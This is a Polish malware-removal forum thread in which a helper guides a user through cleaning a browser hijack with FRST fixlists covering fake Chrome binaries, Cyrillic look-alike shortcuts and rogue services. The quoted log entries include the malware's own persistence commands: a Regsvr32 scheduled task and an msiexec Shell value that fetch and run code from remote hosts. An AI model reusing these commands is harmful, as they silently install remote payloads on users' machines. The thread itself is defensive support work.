247) utworzono 21 kwietnia 2017 utworzono 21 kwietnia 2017 Witam, mam problem z przeglądarką od kilku dni jest zawirusowana przez jakies Luckystarting. Wrzucam logi z FRST Addition.txt FRST.txt
Twój_Anioł_Stróż komentarz 21 kwietnia 2017 komentarz 21 kwietnia 2017 (edytowane) 1) Otwórz Notatnik i wklej w nim: Cytuj Task: {3DEC9F43-365F-42FA-910A-A8F37294875B} - System32\Tasks\{928C143D-F736-48E5-A9B8-1CB1E2D97104} => Chrome.exe Task: {924E26DC-CAD2-4AD8-87CD-AAA2A29C5713} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj84N8ZLOUVWFUUdRUE5MjJXFjq4N8U5FTLXRTLXMWk4OF== scrobj.dll Task: {9FE9C657-A76D-4157-885D-B1E815B994C5} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-31] () Task: {AD8D29ED-099D-448F-941D-F9DDC0943840} - System32\Tasks\ZapalkaEffacingCrispsV2 => Rundll32.exe InterlocutionYawns.dll,main 7 1 <==== UWAGA HKU\S-1-5-21-1639591219-2897822324-1821398486-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj84N8ZLOUVWFUUdRUE5MjJXFjq4N8U5FTLXRTLXMWk4OF== /q RemoveDirectory: C:\Program Files (x86)\MIO RemoveDirectory: C:\Program Files (x86)\Boxbob RemoveDirectory: C:\Program Files (x86)\HPDef RemoveDirectory: C:\Program Files (x86)\Firefox IFEO\DisplaySwitch.exe: [Debugger] IFEO\taskmgr.exe: [Debugger] FF Extension: (FF Adr) - C:\Users\Zapalka\AppData\Roaming\Firefox\Firefox\Profiles\mxqha68q.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-21] [Brak podpisu cyfrowego] FF SearchPlugin: C:\Users\Zapalka\AppData\Roaming\Firefox\Firefox\Profiles\mxqha68q.default\searchplugins\startsearch.xml [2017-04-21] CHR Extension: (FACEIT HELPER) - C:\Users\Zapalka\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bjdhcabjnhhifipbnopnfpfidkafanjf [2017-04-21] S3 ibtusb; system32\DRIVERS\ibtusb.sys [X] C:\Windows\SysWOW64\33 C:\Windows\SysWOW64\11 C:\Users\Zapalka\AppData\Roaming\WinSAPSvc C:\Program Files (x86)\Everbean 2017-04-19 18:52 - 2017-04-21 17:12 - 00000000 _____ C:\Users\Public\Documents\temp.dat 2017-04-19 18:52 - 2017-04-21 17:10 - 00000000 _____ C:\Users\Public\Documents\report.dat 2017-04-19 17:30 - 2017-04-19 17:30 - 00000000 ____D C:\Program Files (x86)\Dohat C:\ProgramData\Software C:\Users\Zapalka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk C:\Users\Zapalka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WаrТhundеr.lnk C:\Users\Zapalka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехрlоrеr (Nо Аdd-оns).lnk C:\Users\Zapalka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Zapalka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Zapalka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Zapalka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{8EB3F229-2A87-4BF5-8AE7-399A15D609FB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{4E0346AF-2399-4279-9F82-931B8B3EF68E}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe FirewallRules: [{173F400D-583C-4883-863C-F88A9719C0B6}] => (Allow) C:\Program Files (x86)\MIO\loader\wdcxwd10spcx-24hwst1_wd-wxg1a95c0tx6c0tx6.dat FirewallRules: [{40A9E421-E382-4DD7-8E46-9108DCBDD29C}] => (Allow) C:\Program Files (x86)\MIO\loader\wdcxwd10spcx-24hwst1_wd-wxg1a95c0tx6c0tx6.dat FirewallRules: [{74BA1782-3EA3-4579-BCE2-EE004E19B720}] => (Allow) C:\Program Files (x86)\Boxbob\Application\chrome.exe HKU\S-1-5-21-1639591219-2897822324-1821398486-1000\...\Run: [CW] => [X] C:\Users\Default\AppData\Roaming\WinSAPSvc C:\Users\Default User\AppData\Roaming\WinSAPSvc C:\Program Files (x86)\BiaoJi C:\Users\Zapalka\AppData\Roaming\SSMgre HOSTS: EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). 2) Użyj >Adw-cleaner najpierw kliknij na SKANUJ (SCAN), a dopiero po zakończeniu skanowania, gdy uaktywni się przycisk USUŃ (CLEANING), to kliknij na niego. Pokaż raport z niego "C" 3)Zrób nowe logi FRST. przed skanem zaznacz: Additional.txt Shortcut.txt, Edytowane 21 kwietnia 2017 przez Twój_Anioł_Stróż
247) komentarz 21 kwietnia 2017 Autor komentarz 21 kwietnia 2017 Zrobione, usuneło mi przeglądarki zainstalowałem chroma póki co jest ok. 2) Po kliknięciu skanuj cały czas wywala program (Brak odpowiedzi) 3) nowe logi FRST.txt Addition.txt Shortcut.txt
Twój_Anioł_Stróż komentarz 21 kwietnia 2017 komentarz 21 kwietnia 2017 (edytowane) usuneło mi przeglądarki zainstalowałem chroma Nie, zostały usunięte tylko skróty, bo przekierowywały do fałszywej przeglądarki C:\Program Files (x86)\Boxbob\Application\chrome.exe, która wyglądała jak Google Chrome, ale w rzeczywistości to był Trojan. Natomiast w przypadku Mozilli Firefox, to skróty kierowały do ruskiej przeglądarki. Wystarczyło zrobić nowe skróty, zamiast instalować przeglądarki od nowa. Teraz jest podobna sytuacja: Cytuj Shortcut: C:\Users\Zapalka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files (x86)\HPDef\Starter.exe (Brak pliku) <===== Cyrillic Shortcut: C:\Users\Zapalka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WаrТhundеr.lnk -> C:\Program Files (x86)\HPDef\Starter.exe (Brak pliku) <===== Cyrillic Shortcut: C:\Users\Zapalka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехрlоrеr (Nо Аdd-оns).lnk -> C:\Program Files (x86)\HPDef\Starter.exe (Brak pliku) <===== Cyrillic Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Brak pliku) <===== Cyrillic Otwórz Notatnik i wklej w nim: S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] S3 btmhsf; system32\DRIVERS\btmhsf.sys [X] C:\Users\Public\Documents\temp.dat C:\Users\Zapalka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk C:\Program Files (x86)\HPDef C:\Users\Zapalka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WаrТhundеr.lnk C:\Users\Zapalka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехрlоrеr (Nо Аdd-оns).lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). Edytowane 21 kwietnia 2017 przez Twój_Anioł_Stróż
247) komentarz 8 maja 2017 Autor komentarz 8 maja 2017 Dnia 21.04.2017 o 20:22, Twój_Anioł_Stróż napisał: usuneło mi przeglądarki zainstalowałem chroma Nie, zostały usunięte tylko skróty, bo przekierowywały do fałszywej przeglądarki C:\Program Files (x86)\Boxbob\Application\chrome.exe, która wyglądała jak Google Chrome, ale w rzeczywistości to był Trojan. Natomiast w przypadku Mozilli Firefox, to skróty kierowały do ruskiej przeglądarki. Wystarczyło zrobić nowe skróty, zamiast instalować przeglądarki od nowa. Teraz jest podobna sytuacja: Otwórz Notatnik i wklej w nim: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). Cześć, problem powrócił najprawdopodobniej nie usunąłem jakiegoś skrótu z chrome i ponownie mam problem z luckystarting. Wrzucam logi Addition.txt FRST.txt
Twój_Anioł_Stróż komentarz 9 maja 2017 komentarz 9 maja 2017 (edytowane) 1) Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego: Cytuj HKU\S-1-5-21-1639591219-2897822324-1821398486-1000\...\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.) <==== UWAGA C:\Program Files (x86)\Bookness C:\Users\Zapalka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk C:\Users\Zapalka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WаrТhundеr.lnk C:\Users\Zapalka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехрlоrеr (Nо Аdd-оns).lnk C:\Users\Zapalka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Zapalka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk C:\Users\Public\Desktop\Google Chrome.lnk C:\Program Files (x86)\HPDef\ 2017-05-08 20:27 - 2017-05-08 08:27 - 00105984 _____ () c:\programdata\microsoft\appv\setup\integrator.dll 2017-05-08 20:27 - 2017-05-08 08:27 - 00105984 _____ () C:\ProgramData\Microsoft\AppV\Setup\Integrator.dll C:\ProgramData\Microsoft\AppV c:\programdata\microsoft\appv FirewallRules: [{55917EB7-ADC6-4C3E-ABA2-C80DB6520A48}] => (Allow) C:\Program Files (x86)\Bookness\Application\chrome.exe BHO: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie64.dll => Brak pliku BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll => Brak pliku Toolbar: HKLM - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie64.dll Brak pliku Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll Brak pliku FF ProfilePath: C:\Users\Zapalka\AppData\Roaming\Firefox\Firefox\Profiles\mxqha68q.default [2017-04-21] C:\Users\Zapalka\AppData\Roaming\Firefox R2 WindowsOfficeSrv; C:\ProgramData\Microsoft\OneDrive\Uploader.dll [108544 2017-04-21] () [Brak podpisu cyfrowego] <==== UWAGA R2 WinInstallSvc; C:\ProgramData\Microsoft\AppV\Setup\Integrator.dll [105984 2017-05-08] () [Brak podpisu cyfrowego] 2017-05-08 20:25 - 2017-05-08 20:28 - 00000000 ____D C:\Users\Public\Documents\temp 2017-05-08 20:25 - 2017-05-08 20:25 - 00000000 ____D C:\Users\Public\Documents\chrome 2017-04-21 21:28 - 2017-05-08 20:45 - 00000000 _____ C:\Users\Public\Documents\temp.dat EmptyTemp: Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW). 2) Zrób nowe logi FRST. przed skanem zaznacz: Additional.txt Shortcut.txt, Edytowane 9 maja 2017 przez Twój_Anioł_Stróż
Wciąż szukasz rozwiązania problemu? Napisz teraz na forum!
Możesz zadać pytanie bez konieczności rejestracji - wystarczy, że wypełnisz formularz.